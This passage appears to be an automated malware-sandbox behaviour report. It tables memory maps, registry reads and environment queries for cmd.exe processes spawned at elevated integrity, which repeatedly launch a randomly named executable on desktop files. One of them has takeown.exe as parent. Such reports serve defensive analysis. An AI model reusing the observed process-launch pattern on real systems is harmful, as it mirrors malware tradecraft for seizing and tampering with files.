| pagefile_0x0000000000820000 | 0x00820000 | 0x009a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x009b0000 | 0x00ce6fff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec00000 | 0x7ec00000 | 0x7ecfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed00000 | 0x7ed00000 | 0x7ed22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ed24000 | 0x7ed24000 | 0x7ed24fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed27000 | 0x7ed27000 | 0x7ed29fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed2a000 | 0x7ed2a000 | 0x7ed2afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed2d000 | 0x7ed2d000 | 0x7ed2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #192: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #192 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "blank.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:18, Reason: Child Process |
| Unmonitor | End Time: 00:03:53, Reason: Self Terminated |
| Monitor Duration | 00:00:35 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf74 |
| Parent PID | 0x464 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
3C0
0x
454
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x04a6ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a70000 | 0x04a70000 | 0x04a8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a70000 | 0x04a70000 | 0x04a7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a80000 | 0x04a80000 | 0x04a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04a91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04a93fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004aa0000 | 0x04aa0000 | 0x04ab3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ac0000 | 0x04ac0000 | 0x04afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c00000 | 0x04c00000 | 0x04c03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c10000 | 0x04c10000 | 0x04c10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04c21fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c30000 | 0x04cedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d33fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04f8ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04f90000 | 0x052c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee90000 | 0x7ee90000 | 0x7ef8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef90000 | 0x7ef90000 | 0x7efb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efb8000 | 0x7efb8000 | 0x7efbafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efbb000 | 0x7efbb000 | 0x7efbbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efbc000 | 0x7efbc000 | 0x7efbefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efbf000 | 0x7efbf000 | 0x7efbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 136, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x9ec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #193: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #193 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "Genko_2.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:19, Reason: Child Process |
| Unmonitor | End Time: 00:03:28, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa7c |
| Parent PID | 0xa84 (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1B4
0x
C08
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000003d0000 | 0x003d0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e3fff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x04441fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x04443fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004450000 | 0x04450000 | 0x04463fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004470000 | 0x04470000 | 0x044affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044b0000 | 0x044b0000 | 0x045affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000045b0000 | 0x045b0000 | 0x045b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000045c0000 | 0x045c0000 | 0x045c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000045d0000 | 0x045d0000 | 0x045d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045e0000 | 0x045e0000 | 0x0461ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x0469ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04800000 | 0x048bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000048c0000 | 0x048c0000 | 0x049bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049c0000 | 0x049c0000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04b70000 | 0x04ea6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f1a0000 | 0x7f1a0000 | 0x7f29ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f2a0000 | 0x7f2a0000 | 0x7f2c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f2c6000 | 0x7f2c6000 | 0x7f2c8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f2c9000 | 0x7f2c9000 | 0x7f2c9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f2cc000 | 0x7f2cc000 | 0x7f2ccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f2cd000 | 0x7f2cd000 | 0x7f2cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 119, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x874, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #194: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #194 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:19, Reason: Child Process |
| Unmonitor | End Time: 00:03:28, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb74 |
| Parent PID | 0x9f0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
270
0x
91C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000f10000 | 0x00f10000 | 0x04f0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x04f2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f10000 | 0x04f10000 | 0x04f1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004f20000 | 0x04f20000 | 0x04f23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x04f31fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x04f33fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f40000 | 0x04f40000 | 0x04f53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050a0000 | 0x050a0000 | 0x050a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000050b0000 | 0x050b0000 | 0x050b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000050c0000 | 0x050c0000 | 0x050c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x050d0000 | 0x0518dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005190000 | 0x05190000 | 0x051cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051d0000 | 0x051d0000 | 0x0525ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005290000 | 0x05290000 | 0x0529ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052a0000 | 0x052a0000 | 0x0552ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052a0000 | 0x052a0000 | 0x0539ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005430000 | 0x05430000 | 0x0552ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05530000 | 0x05866fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f830000 | 0x7f830000 | 0x7f92ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f930000 | 0x7f930000 | 0x7f952fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f955000 | 0x7f955000 | 0x7f957fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f958000 | 0x7f958000 | 0x7f958fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f95b000 | 0x7f95b000 | 0x7f95bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f95d000 | 0x7f95d000 | 0x7f95ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
